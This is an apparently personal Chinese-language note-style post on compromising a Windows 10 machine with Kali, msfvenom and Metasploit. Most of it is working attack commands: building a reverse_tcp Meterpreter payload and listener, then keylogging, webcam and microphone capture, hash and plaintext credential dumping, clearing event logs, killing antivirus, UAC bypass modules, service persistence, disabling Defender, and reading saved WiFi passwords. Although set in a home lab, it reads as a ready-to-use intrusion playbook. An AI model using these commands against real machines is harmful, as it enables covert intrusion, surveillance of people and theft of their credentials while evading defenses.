#创作高流量
Kali使用msf,msfconsole,msfvenom对Windows 10专业版渗透提权
(老铁铁们,三联走起)
Who,where,what,when,which,why,how,how much
1.生成payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.125.129 LPORT=4545 -f exe > shell.exe
2.kali开启挂载,Windows下载要关闭实时保护
python3 -m http.server 80
3.kali打开
msfconsole
4.开启监听连接
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.125.129
set lport 4545
show options
run
4.Windows双击shell.exe
kali出现meterpreter
exploit -z -j 后台执行
run vnc -i 监控屏幕
5.查看此时你的用户权限
Getuid
6. 让meterpreter处于后台模式
background
sessions -i index # 与会话进行交互,index表示第一个session 选择目标
session -i 3
quit # 退出会话
shell # 获得控制台权限
- 文件操作命令
getwd 或者pwd # 查看当前工作目录
ls
cd
cat c:\\lltest\\lltestpasswd.txt # 查看文件内容
upload /tmp/hack.txt C:\\lltest # 上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上
edit c:\\1.txt #编辑或创建文件 没有的话,会新建文件
rm C:\\lltest\\hack.txt
mkdir lltest2 #只能在当前目录下创建文件夹
rmdir lltest2 #只能删除当前目录下文件夹
getlwd 或者 lpwd #操作攻击者主机 查看当前目录
lcd /tmp #操作攻击者主机 切换目录
search -f *secret*.doc #全局搜索secret.doc这个文件
- 网络操作指令
ipconfig / ifconfig # 查看网络接口信息
Portfwd # 端口转发 本机监听端口 把目标机端口转到本机端口上
Rdesktop # 使用rdesktop来连接 -u 用户名 -p 密码
Route # 获取路由表信息
- 系统命令
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
getpid # 获取当前进程的pid
kill pid # 杀死进程
getuid # 查看权限
sysinfo # 查看目标机系统信息,如机器名,操作系统等
shutdown # 关机
- 开关键盘鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
uictl enable mouse #开启鼠标
- 摄像头
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
- 执行文件
meterpreter > execute
meterpreter > execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
cmd.exe的路径是跟我们的木马是在一个路径下的
- 进程迁移
ps
migrate [pid]
getpid # 获取当前进程的pid
ps # 查看当前活跃进程
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中
kill <pid值> #杀死进程
- 清除日志
clearev #清除windows中的应用程序日志、系统日志、安全日志,需要管理员权限
- 自动化信息收集
run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks #获取最近的文件操作
run post/windows/gather/enum_ie #获取IE缓存
run post/windows/gather/enum_chrome #获取Chrome缓存
run post/windows/gather/enum_patches #补丁信息
run post/windows/gather/enum_domain #查找域控
- 权限提升
Getsystem
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
- 远程桌面和截屏
enumdesktops #查看可用的桌面
getdesktop #获取当前meterpreter 关联的桌面
set_desktop #设置meterpreter关联的桌面 -h查看帮助
use espia #或者使用espia模块截屏 然后输入screengrab
run vnc #使用vnc远程桌面连接,这方法有点问题,上传了exe但是启动不了
- 关闭杀软
meterpreter > run post/windows/manage/killav //这个脚本要小心使用,可能导致目标机器蓝屏死机
- 获取hash
Hashdump
- 明文密码
load kiwi
creds_call
- 扫描脚本
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/jboss_vulnscan
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/oracle/oracle_login
退出
quit
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
meterpreter命令:
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本
1.首先,检测目标机器中是否存在该漏洞。使用wmic查询命令,列出目标机器中所有没有被引号引起来的服务的路径
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
结果返回:
D:\softwarePath\Nessus\nessus-service.exe D:\softwarePath\vmware16\vmware-authd.exe
Windows:
systeminfo | findstr OS #获取系统版本信息
systeminfo&&wmic product get name,version&&wmic nic where PhysicalAdapter=True get MACAddress,Name&&wmic NICCONFIG WHERE IPEnabled=true GET IPAddress #检测系统软件包
hostname #获取主机名称
whoami /all #获取当前用户的详细信息
whoami /priv #显示当前用户的安全特权
net start #查看服务
quser #获取在线用户
query user #获取在线用户
netstat -ano | findstr 3389 #获取rdp连接(远程桌面协议)来源IP
dir c:\programdata\ #分析安装
wmic qfe get Caption,Description,HotFixID,InstalledOn #列出已安装的补丁
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #获取远程端口
tasklist /svc | find "TermService" #获取服务pid
netstat -ano |find "pid" #获取远程端口
PowerShell
使用 PowerShell 安装 Microsoft Defender 防病毒
Install-WindowsFeature -Name Windows-Defender
验证 Microsoft Defender 防病毒是否正在服务器上运行
Get-Service -Name windefend
验证防火墙保护是否打开
Get-Service -Name mpssvc
使用 PowerShell 打开 GUI
Install-WindowsFeature -Name Windows-Defender-GUI
卸载 Windows Server 2016 或 Windows Server 2019 上的 Microsoft Defender 防病毒
Uninstall-WindowsFeature -Name Windows-Defender
关闭 Microsoft Defender 防病毒 GUI
Uninstall-WindowsFeature -Name Windows-Defender-GUI
Power shell
更改执行策略
Set-ExecutionPolicy Unrestricted
选A
#如果提示在此系统上禁止运行脚本,先执行以下命令即可
Powershell -ExecutionPolicy Bypass
暂时
禁用Microsoft Defender防病毒软件
Set-MpPreference -DisableRealtimeMonitoring $true
如要禁用防病毒,请关闭“篡改防护”。
启用Microsoft Defender防病毒软件
Set-MpPreference -DisableRealtimeMonitoring $false
禁用/启用Microsoft Defender防病毒软件的行为扫描
Set-MpPreference -DisableBehaviorMonitoring $true(禁用)
Set-MpPreference -DisableBehaviorMonitoring $false(启用)
永久组策略关闭实时保护
Win+R gpedit
管理模板
Windows组件
Microsoft Defender 防病毒
实时保护 双击已启用关闭 确定
泥煤的,不要每次启动都打开
还有一种是注册表关闭
防火墙关闭
Cmd、powershell
(一)永久组策略关闭Windows更新
1、打开运行对话框,可以使用“windows徽标键+R”键快捷打开,输入“gpedit.msc”;
2、左侧在计算机配置中,找到管理模板,右侧找到Windows组件;
3. 双击进入后,找到Windows更新;
4. 找到“配置自动更新”,双击进入;
5、在弹出的窗口中,单击“已禁用”,然后单击确定按钮即可。
(二)服务
- 打开运行对话框,输入“services.msc”;
- 在弹出的窗口中,右侧找到“Windows update”;
- 双击进入,在启动类型下拉列表中,单击“禁用”,然后确定;
4、可以看到已禁用自动更新。
6.查看此时你的用户权限
Getuid
7.search suggester 查看适合的漏洞
8.使用漏洞
Use 0
Set sessions 1 设置目标Windows 10的会话
Run 开始执行
乱码解决
Hashdump后
获取明文密码,Kevin第二个
不知道为什么防火墙打开了
Getpid
服务自启动权限维持
sc create test binpath= c:\666.exe (注意等号后面有空格)#创建服务
sc config test start= auto #设置服务为自动启动
net start test #启动服务
服务器没有响应控制,gg
电脑cmd查看WiFi密码
netsh wlan show profile name="连接名" key=clear
netsh wlan show profile name=连接名 key=clear